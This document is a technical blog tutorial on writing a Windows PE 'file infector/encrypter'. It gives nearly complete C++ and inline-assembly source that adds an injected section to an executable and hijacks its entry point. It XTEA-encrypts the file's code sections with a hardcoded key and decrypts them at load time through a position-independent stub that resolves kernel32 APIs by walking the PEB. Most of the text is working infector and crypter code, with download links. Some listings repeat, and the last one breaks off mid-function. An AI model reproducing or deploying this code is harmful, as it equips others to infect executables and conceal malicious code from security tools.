                for(current_byte; current_byte < last_byte; current_byte += 8) {
                    virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, PAGE_EXECUTE_READWRITE, &old_protections);
                    unsigned int block1 = (*current_byte << 24) | (*(current_byte+1) << 16) |
                        (*(current_byte+2) << 8) | *(current_byte+3);
                    unsigned int block2 = (*(current_byte+4) << 24) | (*(current_byte+5) << 16) |
                        (*(current_byte+6) << 8) | *(current_byte+7);
                    unsigned int full_block[] = {block1, block2};
                    unsigned int delta = 0x9E3779B9;
                    unsigned int sum = (delta * num_rounds);
                    for (unsigned int i = 0; i < num_rounds; ++i) {
                        full_block[1] -= (((full_block[0] << 4) ^ (full_block[0] >> 5)) + full_block[0]) ^ (sum + key[(sum >> 11) & 3]);
                        sum -= delta;
                        full_block[0] -= (((full_block[1] << 4) ^ (full_block[1] >> 5)) + full_block[1]) ^ (sum + key[sum & 3]);
                    }
                    *(current_byte+3) = (full_block[0] & 0x000000FF);
                    *(current_byte+2) = (full_block[0] & 0x0000FF00) >> 8;
                    *(current_byte+1) = (full_block[0] & 0x00FF0000) >> 16;
                    *(current_byte+0) = (full_block[0] & 0xFF000000) >> 24;
                    *(current_byte+7) = (full_block[1] & 0x000000FF);
                    *(current_byte+6) = (full_block[1] & 0x0000FF00) >> 8;
                    *(current_byte+5) = (full_block[1] & 0x00FF0000) >> 16;
                    *(current_byte+4) = (full_block[1] & 0xFF000000) >> 24;
                    //Restore protections only after the decrypted bytes are written back.
                    //VirtualProtect fails when its last parameter is NULL, so pass a valid pointer.
                    virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, old_protections, &old_protections);
                }
            }
            section_names_equal = 0;
        }
        __asm {
            mov esp, ebp
            pop ebp
            ret 0x8
        }
 
    __asm {
    virtualprotect:
        call virtualprotectback
        BB('V') BB('i') BB('r') BB('t') BB('u') BB('a') BB('l')
        BB('P') BB('r') BB('o') BB('t') BB('e') BB('c') BB('t') BB(0)
    rdata_name:
        call rdata_nameback
        BB('.') BB('r') BB('d') BB('a') BB('t') BB('a') BB(0)
    rsrc_name:
        call rsrc_nameback
        BB('.') BB('r') BB('s') BB('r') BB('c') BB(0)
    section_name:
        call section_nameback
        BB('.') BB('i') BB('n') BB('j') BB('e') BB('c') BB('t') BB(0)
        int 0x3                 //Function signature
        int 0x3
        int 0x3
        int 0x3
    }
}
#pragma code_seg()
#pragma comment(linker, "/SECTION:.inject,re")
 
wchar_t *convert_to_unicode(char *str, unsigned int length) {
    wchar_t *wstr;
    int wstr_length = MultiByteToWideChar(CP_ACP, 0, str, (length + 1), NULL, 0);
    if(wstr_length <= 0)
        return NULL;
    wstr = (wchar_t *)malloc(wstr_length * sizeof(wchar_t));
    if (wstr == NULL)
        return NULL;
    wmemset(wstr, 0, wstr_length);  //Zero-fill so the result is null-terminated
    int written = MultiByteToWideChar(CP_ACP, 0, str, length, wstr, wstr_length);
    if(written > 0)
        return wstr;
    free(wstr);                     //Don't leak the buffer if the conversion fails
    return NULL;
}
 
int main(int argc, char* argv[]) {
    if(argc != 2) {
        printf("Usage: ./%s <target>\n", argv[0]);
        return -1;
    }
    wchar_t *target_file_name = convert_to_unicode(argv[1], strlen(argv[1]));
    if(target_file_name == NULL) {
        printf("Could not convert %s to unicode\n", argv[1]);
        return -1;
    }
    pfile_info target_file = file_info_create();
    void (*stub_addr)(void) = injection_stub;
    unsigned int stub_size = get_stub_size(stub_addr);
    unsigned int stub_size_aligned = 0;
    bool map_file_success = map_file(target_file_name, stub_size, false, target_file);
    if(map_file_success == false) {
        wprintf(L"Could not map target file\n");
        return -1;
    }
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)target_file->file_mem_buffer;
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    stub_size_aligned = align_to_boundary(stub_size, nt_headers->OptionalHeader.SectionAlignment);
    const char *section_name = ".inject";
    file_info_destroy(target_file);
    target_file = file_info_create();
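    if(map_file(target_file_name, stub_size_aligned, true, target_file) == false) {
        wprintf(L"Could not remap target file\n");
        return -1;
    }
    //The first view was unmapped above, so re-derive the header pointers from the new view
    dos_header = (PIMAGE_DOS_HEADER)target_file->file_mem_buffer;
    nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);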
    PIMAGE_SECTION_HEADER new_section = add_section(section_name, stub_size_aligned, target_file->file_mem_buffer);
    if(new_section == NULL) {
        wprintf(L"Could not add new section to file");
        return -1;
    }
    write_stub_entry_point(nt_headers, stub_addr);
    copy_stub_instructions(new_section, target_file->file_mem_buffer, stub_addr);
    change_file_oep(nt_headers, new_section);
    encrypt_file(nt_headers, target_file, section_name);
    int flush_view_success = FlushViewOfFile(target_file->file_mem_buffer, 0);
    if(flush_view_success == 0)
        wprintf(L"Could not save changes to file");
    file_info_destroy(target_file);
    return 0;
}
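
The inner loop of decrypt_sections in Main.cpp above has the same form as the decryption rounds of the XTEA block cipher (32 rounds, delta 0x9E3779B9, 128-bit key). As a hedged, standalone sketch of how the encryption and decryption rounds mirror each other, the pair below round-trips one 64-bit block. The function names xtea_encrypt and xtea_decrypt are chosen for this example and are not taken from the post's source; the key in the usage note is the one hardcoded in the listing.

```cpp
#include <cassert>
#include <cstdint>

// Round constant, the same value as `delta` in the listing.
const std::uint32_t kDelta = 0x9E3779B9;

// Encrypts one 64-bit block (two 32-bit words) in place with a 128-bit key.
void xtea_encrypt(unsigned int num_rounds, std::uint32_t block[2],
                  const std::uint32_t key[4]) {
    assert(block != nullptr && key != nullptr);
    std::uint32_t v0 = block[0], v1 = block[1], sum = 0;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
        sum += kDelta;
        v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
    }
    block[0] = v0;
    block[1] = v1;
}

// Runs the same steps in reverse order, starting from the final value of sum.
void xtea_decrypt(unsigned int num_rounds, std::uint32_t block[2],
                  const std::uint32_t key[4]) {
    assert(block != nullptr && key != nullptr);
    std::uint32_t v0 = block[0], v1 = block[1], sum = kDelta * num_rounds;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
        sum -= kDelta;
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
    }
    block[0] = v0;
    block[1] = v1;
}
```

Encrypting a block and then decrypting it with the same key and round count, for example 32 rounds with the key {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE}, yields the original two words again. The stub depends on this property when it restores each section at load time.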

Injector.cpp

#include "Injector.h"
#include <stdio.h>
 
//Assumes malloc won't fail
pfile_info file_info_create(void) {
    pfile_info mapped_file_info = (pfile_info)malloc(sizeof(file_info));
    memset(mapped_file_info, 0, sizeof(file_info));
    return mapped_file_info;
}
 
//Assumes everything is valid, doesn't report error code
void file_info_destroy(pfile_info mapped_file_info) {
    if(mapped_file_info->file_mem_buffer != NULL)
        UnmapViewOfFile(mapped_file_info->file_mem_buffer);
    if(mapped_file_info->file_handle != NULL)
        CloseHandle(mapped_file_info->file_handle);
    if(mapped_file_info->file_map_handle != NULL)
        CloseHandle(mapped_file_info->file_map_handle);
    free(mapped_file_info);
    mapped_file_info = NULL;
}
 
unsigned int align_to_boundary(unsigned int address, unsigned int boundary) {
    return (((address + boundary - 1) / boundary) * boundary);
}
 
unsigned int get_stub_size(void* stub_addr) {
    unsigned int size = 0;
    if(stub_addr != NULL) {
        const char *stub_signature = "\xCC\xCC\xCC\xCC";
        while(memcmp(((unsigned char *)stub_addr + size), stub_signature, sizeof(int)) != 0)
            ++size;
    }
    return size;
}
 
bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info) {
    void *file_handle = CreateFile(file_name, GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file_handle == INVALID_HANDLE_VALUE) {
        wprintf(L"Could not open %s", file_name);
        return false;
    }
    unsigned int file_size = GetFileSize(file_handle, NULL);
    if(file_size == INVALID_FILE_SIZE) {
        wprintf(L"Could not get file size for %s", file_name);
        CloseHandle(file_handle);
        return false;
    }
    if(append_mode == true) {
        file_size += (stub_size + sizeof(DWORD_PTR));
    }
    void *file_map_handle = CreateFileMapping(file_handle, NULL, PAGE_READWRITE, 0,
        file_size, NULL);
    if(file_map_handle == NULL) {
        wprintf(L"File map could not be opened");
        CloseHandle(file_handle);
        return false;
    }
    void *file_mem_buffer = MapViewOfFile(file_map_handle, FILE_MAP_WRITE, 0, 0, file_size);
    if(file_mem_buffer == NULL) {
        wprintf(L"Could not map view of file");
        CloseHandle(file_map_handle);
        CloseHandle(file_handle);
        return false;
    }
    mapped_file_info->file_handle = file_handle;
    mapped_file_info->file_map_handle = file_map_handle;
    mapped_file_info->file_mem_buffer = (unsigned char*)file_mem_buffer;
    return true;
}
 
//Reference: http://www.codeproject.com/KB/system/inject2exe.aspx
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr) {
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)image_addr;
    if(dos_header->e_magic != 0x5A4D) {
        wprintf(L"Could not retrieve DOS header from %p", image_addr);
        return NULL;
    }
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    if(nt_headers->OptionalHeader.Magic != 0x010B) {
        wprintf(L"Could not retrieve NT header from %p", dos_header);
        return NULL;
    }
    const int name_max_length = 8;
    PIMAGE_SECTION_HEADER last_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections - 1);
    PIMAGE_SECTION_HEADER new_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections);
    memset(new_section, 0, sizeof(IMAGE_SECTION_HEADER));
    new_section->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;
    memcpy(new_section->Name, section_name, name_max_length);
    new_section->Misc.VirtualSize = section_size;
    new_section->PointerToRawData = align_to_boundary(last_section->PointerToRawData + last_section->SizeOfRawData,
        nt_headers->OptionalHeader.FileAlignment);
    new_section->SizeOfRawData = align_to_boundary(section_size, nt_headers->OptionalHeader.SectionAlignment);
    new_section->VirtualAddress = align_to_boundary(last_section->VirtualAddress + last_section->Misc.VirtualSize,
        nt_headers->OptionalHeader.SectionAlignment);
    nt_headers->OptionalHeader.SizeOfImage =  new_section->VirtualAddress + new_section->Misc.VirtualSize;
    nt_headers->FileHeader.NumberOfSections++;
    return new_section;
}
 
void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr) {
    unsigned int stub_size = get_stub_size(stub_addr);
    memcpy(((unsigned char *)image_addr + section->PointerToRawData), stub_addr, stub_size);
}
 
void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section) {
    unsigned int file_address = section->PointerToRawData;
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        if(file_address >= current_section->PointerToRawData &&
            file_address < (current_section->PointerToRawData + current_section->SizeOfRawData)) {
            file_address -= current_section->PointerToRawData;
            file_address += (nt_headers->OptionalHeader.ImageBase + current_section->VirtualAddress);
            break;
        }
        ++current_section;
    }
    nt_headers->OptionalHeader.AddressOfEntryPoint =  file_address - nt_headers->OptionalHeader.ImageBase;
}
 
void write_stub_entry_point(PIMAGE_NT_HEADERS nt_headers, void *stub_addr) {
    if(stub_addr != NULL) {
        const char *signature = "\xFF\xEE\xDD\xCC";
        unsigned int index = 0;
        while(memcmp(((unsigned char *)stub_addr + index), signature, sizeof(int)) != 0) {
            ++index;
        }
        DWORD old_protections = 0;
        VirtualProtect(((unsigned char *)stub_addr + index), sizeof(DWORD), PAGE_EXECUTE_READWRITE, &old_protections);
        memcpy(((unsigned char *)stub_addr + index), &nt_headers->OptionalHeader.AddressOfEntryPoint, sizeof(DWORD));
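        //VirtualProtect fails if lpflOldProtect is NULL, so a valid pointer is passed when restoring
        VirtualProtect(((unsigned char *)stub_addr + index), sizeof(DWORD), old_protections, &old_protections);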
    }
}

Injector.h

#pragma once
#include <Windows.h>
 
typedef struct {
    void *file_handle;
    void *file_map_handle;
    unsigned char *file_mem_buffer;
} file_info, *pfile_info;
 
pfile_info file_info_create(void);
void file_info_destroy(pfile_info mapped_file_info);
unsigned int align_to_boundary(unsigned int address, unsigned int boundary);
unsigned int get_stub_size(void* stub_addr);
bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info);
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr);
void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr);
void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section);
void write_stub_entry_point(PIMAGE_NT_HEADERS nt_headers, void *stub_addr);

Encrypter.cpp

#include "Encrypter.h"
#include <stdio.h>
#include <string.h>
 
void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name) {
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    const char *excluded_sections[] = {".rdata", ".rsrc", excluded_section_name};
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
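        int excluded = 1;   //Stays 1 only while the section name matches none of the excluded names
        for(int j = 0; j < sizeof(excluded_sections)/sizeof(excluded_sections[0]); ++j)
            excluded &= (strncmp(excluded_sections[j], (char *)current_section->Name, IMAGE_SIZEOF_SHORT_NAME) != 0);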
        if(excluded != 0) {
            unsigned char *section_start = 
                (unsigned char *)target_file->file_mem_buffer + current_section->PointerToRawData;
            unsigned char *section_end = section_start + current_section->SizeOfRawData;
            const unsigned int num_rounds = 32;
            const unsigned int key[] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
            for(unsigned char *k = section_start; k < section_end; k += 8) {
                unsigned int block1 = (*k << 24) | (*(k+1) << 16) | (*(k+2) << 8) | *(k+3);
                unsigned int block2 = (*(k+4) << 24) | (*(k+5) << 16) | (*(k+6) << 8) | *(k+7);
                unsigned int full_block[] = {block1, block2};
                encrypt(num_rounds, full_block, key);
                full_block[0] = swap_endianess(full_block[0]);
                full_block[1] = swap_endianess(full_block[1]);
                memcpy(k, full_block, sizeof(full_block));
            }
        }
        current_section++;
    }
}
 
//Encryption/decryption routines modified from http://en.wikipedia.org/wiki/XTEA
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int sum = 0;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        blocks[0] += (((blocks[1] << 4) ^ (blocks[1] >> 5)) + blocks[1]) ^ (sum + key[sum & 3]);
        sum += delta;
        blocks[1] += (((blocks[0] << 4) ^ (blocks[0] >> 5)) + blocks[0]) ^ (sum + key[(sum >> 11) & 3]);
    }
}
 
//Unused, kept for testing/verification
void decrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int sum = delta * num_rounds;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        blocks[1] -= (((blocks[0] << 4) ^ (blocks[0] >> 5)) + blocks[0]) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        blocks[0] -= (((blocks[1] << 4) ^ (blocks[1] >> 5)) + blocks[1]) ^ (sum + key[sum & 3]);
    }
}
 
inline unsigned int swap_endianess(unsigned int value) {
    return (value >> 24) |  ((value << 8) & 0x00FF0000) |
        ((value >> 8) & 0x0000FF00) | (value << 24);
}

Encrypter.h

#pragma once
#include "Injector.h"
 
void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name);
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]);
void decrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]);
unsigned int swap_endianess(unsigned int value);

A few general remarks about the code:

  • Programs utilizing TLS callbacks may or may not work properly (depending on what the callbacks do). Full support for TLS callbacks can be implemented without issue.
  • An interesting idea would be to decrypt sections or pages as needed. This could be done by setting memory breakpoints on the sections or on individual pages. The instructions can be encrypted again once they’ve executed. This requires quite a bit of work in implementing an SEH handler in assembly and registering it in the process’s exception handler list.
  • This code only works on x86 executables. This is extremely obvious and not much can be done in that regard.
  • The source needs to be built in release mode with any sort of extra optimizations/security (ESP checking/security cookies) disabled.

The source code and compiled sample can be found here
A Visual Studio 2010 project can be found here
A downloadable PDF of this post can be found here

Writing a File Infector/Encrypter: Writing the Compiled Stub (3/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

This post will explain the “bulk” of the file infector. It will focus on writing the code to be injected and how to take advantage of the compiler to generate the instructions to inject into the target application. I will clarify that generating the instructions to inject means that the infector will be writing part of itself into the target application, and not that it will generate an additional assembly listing with any compiler flags which is then injected into the target by a different means. The main concept is that this will be done by declaring a naked function whose functionality is independent of where in memory it is written and what program it is injected into (architecture limitations aside, obviously). The infector will then read the function’s contents in memory and write them into the target application. The injection code needs to do several important things:

  • Preserve the registers upon entry (simple pushad/popad instructions; I miss the hell out of these two instructions in x86-64).
  • Find and store the load address of the image and of kernel32.dll
  • Implement GetProcAddress as well as some C runtime functions such as strcmp and strlen
  • Decrypt all encrypted sections in memory
  • Return execution to the normal application

Finding the load address of the image and of kernel32.dll is pretty straightforward. The technique that I used is an old shellcoding technique and should be compatible with Windows XP through Windows 7. It works by finding the Process Environment Block (PEB) and then traversing the InLoadOrderModuleList found in the PEB_LDR_DATA structure that PEB->Ldr (a PPEB_LDR_DATA) points to. The definitions for these structures are all found in the link above. InLoadOrderModuleList is not found on MSDN, but the NTInternals site has the “proper” definition. Using the PEB is a great way to do this since a pointer to it can always be found at the same location, namely fs:[0x30]. What makes InLoadOrderModuleList so special is that the first entry describes the image itself, so its DllBase member is the load address of the image. This is great because now there’s no worry about randomized base addresses. Also, the third entry describes kernel32.dll, so its DllBase is the load address of kernel32.dll, which contains LoadLibrary and other very useful APIs such as VirtualProtect. The code for the injection function then, so far, looks like this:

void __declspec(naked) injection_stub(void) {
    __asm { //Prologue, stub entry point
        pushad                   //Save context of entry point
        push ebp                //Set up stack frame
        mov ebp, esp
        sub esp, 0x200        //Space for local variables
 
    }
    PIMAGE_DOS_HEADER target_image_base;
    PIMAGE_DOS_HEADER kernel32_image_base;
    __asm {
        call get_module_list   //Get InLoadOrderModuleList through the PEB
        mov ebx, eax
        push 0
        push ebx
        call get_dll_base       //Get image base of process
        mov [target_image_base], eax
        push 2
        push ebx
        call get_dll_base       //Get kernel32.dll image base
        mov [kernel32_image_base], eax
    }

A stack frame is set up so the local variables can be referenced without issue. The value subtracted from ESP to make space for the local variables does not need to be exact since there’s no way to tell how the compiler will allocate the local variables in the stack frame. The value simply needs to be large enough that the state of the stack won’t get messed up by these allocations. It is possible to go back and look at the assembly dump of the function and modify the value so that there’s just enough room for those worried about space/cleanliness. With that out of the way, the remainder of the code calls two other functions, get_module_list and get_dll_base, which get InLoadOrderModuleList and an entry in InLoadOrderModuleList respectively. These are implemented as follows:

///////////////////////////////////////////////////////////////////
//Gets the module list
//Preserves no registers, PEB->Ldr->InLoadOrderModuleList returned in EAX
///////////////////////////////////////////////////////////////////
__asm {
get_module_list:       
        mov eax, fs:[0x30]   //PEB
        mov eax, [eax+0xC]  //PEB->Ldr (PPEB_LDR_DATA)
        mov eax, [eax+0xC]  //PEB->Ldr->InLoadOrderModuleList.Flink (first entry)
        retn
}
///////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////
//Gets the DllBase member of the InLoadOrderModuleList structure
//Call as void *get_dll_base(void *InLoadOrderModuleList, int index)
///////////////////////////////////////////////////////////////////
__asm {
get_dll_base:
    push ebp
    mov ebp, esp
    mov eax, [ebp+0x8]      //InLoadOrderModuleList address, loaded first so an index of zero also works
    mov ecx, [ebp+0xC]      //Set loop index
    test ecx, ecx           //Index zero: the first entry is the one wanted
    jz done
    traverse_list:
        mov eax, [eax]        //Go to next entry
    loop traverse_list
    done:
        mov eax, [eax+0x18] //LDR_DATA_TABLE_ENTRY.DllBase of the selected entry
        mov esp, ebp
        pop ebp
        ret 0x8
}
///////////////////////////////////////////////////////////////////
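
For readers who prefer C++ to inline assembly, the list walk that get_dll_base performs can be sketched as below. This is only an illustration under simplifying assumptions: list_entry and module_entry are hypothetical, stripped-down stand-ins for LIST_ENTRY and LDR_DATA_TABLE_ENTRY (the real entry has more fields, which is why the stub reads DllBase at offset 0x18), and link_modules exists only to build a fake list to walk.

```cpp
#include <assert.h>
#include <stddef.h>

//Hypothetical stand-in for LIST_ENTRY
struct list_entry {
    list_entry *flink;
    list_entry *blink;
};

//Hypothetical stand-in for LDR_DATA_TABLE_ENTRY, reduced to the fields the walk needs
struct module_entry {
    list_entry in_load_order;   //First member, so an entry and its link share an address
    void *dll_base;
};

//Follows index forward links starting at first, then returns that entry's base address
void *get_dll_base_sketch(list_entry *first, unsigned int index) {
    assert(first != NULL);
    list_entry *current = first;
    for(unsigned int i = 0; i < index; ++i) {
        current = current->flink;
    }
    return reinterpret_cast<module_entry *>(current)->dll_base;
}

//Links an array of entries into a circular doubly linked list (test scaffolding only)
void link_modules(module_entry *entries, size_t count) {
    for(size_t i = 0; i < count; ++i) {
        entries[i].in_load_order.flink = &entries[(i + 1) % count].in_load_order;
        entries[i].in_load_order.blink = &entries[(i + count - 1) % count].in_load_order;
    }
}
```

With three linked entries standing in for the image, ntdll.dll, and kernel32.dll, an index of 0 returns the first entry's base and an index of 2 returns the third entry's base, mirroring the two calls made from the stub.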

The next step is to implement GetProcAddress. The code for this is shown below:

///////////////////////////////////////////////////////////////////
//Implementation of GetProcAddress
//Call as FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
///////////////////////////////////////////////////////////////////
get_proc_address:
    __asm {
        push ebp
        mov ebp, esp
        sub esp, 0x200
    }
    PIMAGE_DOS_HEADER kernel32_dos_header;
    PIMAGE_NT_HEADERS kernel32_nt_headers;
    PIMAGE_EXPORT_DIRECTORY kernel32_export_dir;
    unsigned short *ordinal_table;
    unsigned long *function_table;
    FARPROC function_address;
    int function_names_equal;
    __asm { //Initializations
        mov eax, [ebp+0x8]
        mov kernel32_dos_header, eax
        mov function_names_equal, 0x0
        mov function_address, 0x0   //Return NULL if the name is never found
    }
    kernel32_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)kernel32_dos_header + kernel32_dos_header->e_lfanew);
    kernel32_export_dir = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)kernel32_dos_header + 
        kernel32_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    for(unsigned long i = 0; i < kernel32_export_dir->NumberOfNames; ++i) {
        char *eat_entry = (*(char **)((DWORD_PTR)kernel32_dos_header + kernel32_export_dir->AddressOfNames + i * sizeof(DWORD_PTR)))
            + (DWORD_PTR)kernel32_dos_header;   //Current name in name table
        STRING_COMPARE([ebp+0xC], eat_entry) //Compare function in name table with the one we want to find
        __asm mov function_names_equal, eax
        if(function_names_equal == 1) {
            ordinal_table = (unsigned short *)(kernel32_export_dir->AddressOfNameOrdinals + (DWORD_PTR)kernel32_dos_header);
            function_table = (unsigned long *)(kernel32_export_dir->AddressOfFunctions + (DWORD_PTR)kernel32_dos_header);
            function_address = (FARPROC)((DWORD_PTR)kernel32_dos_header + function_table[ordinal_table[i]]);
            break;
        }
    }
    __asm {
        mov eax, function_address
        mov esp, ebp
        pop ebp
        ret 0x8
    }
///////////////////////////////////////////////////////////////////

This function looks pretty complex, but in actuality it is pretty simple. The image below reproduced from Matt Pietrek’s article will clarify things a lot.

This function starts off by finding the export directory (IMAGE_EXPORT_DIRECTORY structure) in kernel32.dll. This structure contains all of the relevant information about the exports of kernel32.dll. A loop is set up to iterate through all of the exported names. On each iteration an entry from the name table (AddressOfNames) is retrieved. This is the name of a function that is exported by the DLL (e.g. “LoadLibraryA”, “GetSystemInfo”, etc.). This string is then compared with the name of the function to find. If there is a match, the ordinal number is obtained from the ordinal table (AddressOfNameOrdinals) at the same index. This is then used as an index into the function address table (AddressOfFunctions) to retrieve the address of the function. And that’s all there is to it. STRING_COMPARE is just a macro that calls the stub’s own implementations of strlen and a strcmp variant. The macro and two functions are pretty straightforward and don’t really warrant any discussion. Now that GetProcAddress is implemented, the next step is to use it to decrypt the sections in memory. This will utilize the VirtualProtect API and also the decryption function for the XTEA block cipher. The function, in its entirety, is shown below:
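
As a brief aside before that listing, the name table to ordinal table to function table lookup described above can be sketched in portable C++. This is a simplified model rather than the stub's code: export_table_sketch is a hypothetical structure holding plain arrays, whereas the real IMAGE_EXPORT_DIRECTORY stores RVAs that must be added to the module base first.

```cpp
#include <assert.h>
#include <stddef.h>
#include <string.h>

//Hypothetical, flattened model of the three export tables
struct export_table_sketch {
    size_t number_of_names;
    const char *const *names;               //Models AddressOfNames
    const unsigned short *name_ordinals;    //Models AddressOfNameOrdinals, parallel to names
    const unsigned long *functions;         //Models AddressOfFunctions (RVAs)
};

//Returns the RVA of the named export, or 0 if the name is not in the name table
unsigned long find_export_rva(const export_table_sketch &table, const char *name) {
    assert(name != NULL);
    for(size_t i = 0; i < table.number_of_names; ++i) {
        if(strcmp(table.names[i], name) == 0) {
            //The i-th name maps to the i-th ordinal, which indexes the function table
            return table.functions[table.name_ordinals[i]];
        }
    }
    return 0;
}
```

The point of the extra indirection is that the name table and the function table are not ordered the same way, so the ordinal table is what ties a name to its address. With that aside out of the way, the full decrypt_sections listing follows.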

///////////////////////////////////////////////////////////////////
//Decrypts all sections in the image, excluding .rdata/.rsrc/.inject
//Call as void decrypt_sections(void *image_base, void *kernel32_base)
///////////////////////////////////////////////////////////////////
decrypt_sections:
    __asm {
        push ebp
        mov ebp, esp
        sub esp, 0x200
    }
    typedef BOOL (WINAPI *pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect,
        PDWORD lpflOldProtect);
    char *str_virtualprotect;
    char *str_section_name;
    char *str_rdata_name;
    char *str_rsrc_name;
    PIMAGE_DOS_HEADER target_dos_header;
    int section_offset;
    int section_names_equal;
    unsigned long old_protections;
    pVirtualProtect virtualprotect_addr;
    __asm { //String initializations
        jmp virtualprotect
        virtualprotectback:
            pop esi
            mov str_virtualprotect, esi
        jmp section_name
        section_nameback:
            pop esi
            mov str_section_name, esi
        jmp rdata_name
        rdata_nameback:
            pop esi
            mov str_rdata_name, esi
        jmp rsrc_name
        rsrc_nameback:
            pop esi
            mov str_rsrc_name, esi
    }
    __asm { //Initializations
        mov eax, [ebp+0x8]
        mov target_dos_header, eax
        mov section_offset, 0x0
        mov section_names_equal, 0x0
        push str_virtualprotect
        push [ebp+0xC]
        call get_proc_address
        mov virtualprotect_addr, eax
    }
    PIMAGE_NT_HEADERS target_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)target_dos_header + target_dos_header->e_lfanew);
    for(unsigned long j = 0; j < target_nt_headers->FileHeader.NumberOfSections; ++j) {
        section_offset = (target_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS) +
            (sizeof(IMAGE_SECTION_HEADER) * j));
        PIMAGE_SECTION_HEADER section_header = (PIMAGE_SECTION_HEADER)((DWORD_PTR)target_dos_header + section_offset);
        STRING_COMPARE(str_section_name, section_header)
        __asm mov section_names_equal, eax
        STRING_COMPARE(str_rdata_name, section_header)
        __asm add section_names_equal, eax
        STRING_COMPARE(str_rsrc_name, section_header)
        __asm add section_names_equal, eax
        if(section_names_equal == 0) {
            unsigned char *current_byte = 
                (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress);
            unsigned char *last_byte = 
                (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress 
                + section_header->SizeOfRawData);
            const unsigned int num_rounds = 32;
            const unsigned int key[4] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
            for(current_byte; current_byte < last_byte; current_byte += 8) {
                virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, PAGE_EXECUTE_READWRITE, &old_protections);
                unsigned int block1 = (*current_byte << 24) | (*(current_byte+1) << 16) |
                    (*(current_byte+2) << 8) | *(current_byte+3);
                unsigned int block2 = (*(current_byte+4) << 24) | (*(current_byte+5) << 16) |
                    (*(current_byte+6) << 8) | *(current_byte+7);
                unsigned int full_block[] = {block1, block2};
                unsigned int delta = 0x9E3779B9;
                unsigned int sum = (delta * num_rounds);
                for (unsigned int i = 0; i < num_rounds; ++i) {
                    full_block[1] -= (((full_block[0] << 4) ^ (full_block[0] >> 5)) + full_block[0]) ^ (sum + key[(sum >> 11) & 3]);
                    sum -= delta;
                    full_block[0] -= (((full_block[1] << 4) ^ (full_block[1] >> 5)) + full_block[1]) ^ (sum + key[sum & 3]);
                }
                //Write the decrypted block back (big-endian byte order) while the page is still writable
                *(current_byte+3) = (full_block[0] & 0x000000FF);
                *(current_byte+2) = (full_block[0] & 0x0000FF00) >> 8;
                *(current_byte+1) = (full_block[0] & 0x00FF0000) >> 16;
                *(current_byte+0) = (full_block[0] & 0xFF000000) >> 24;
                *(current_byte+7) = (full_block[1] & 0x000000FF);
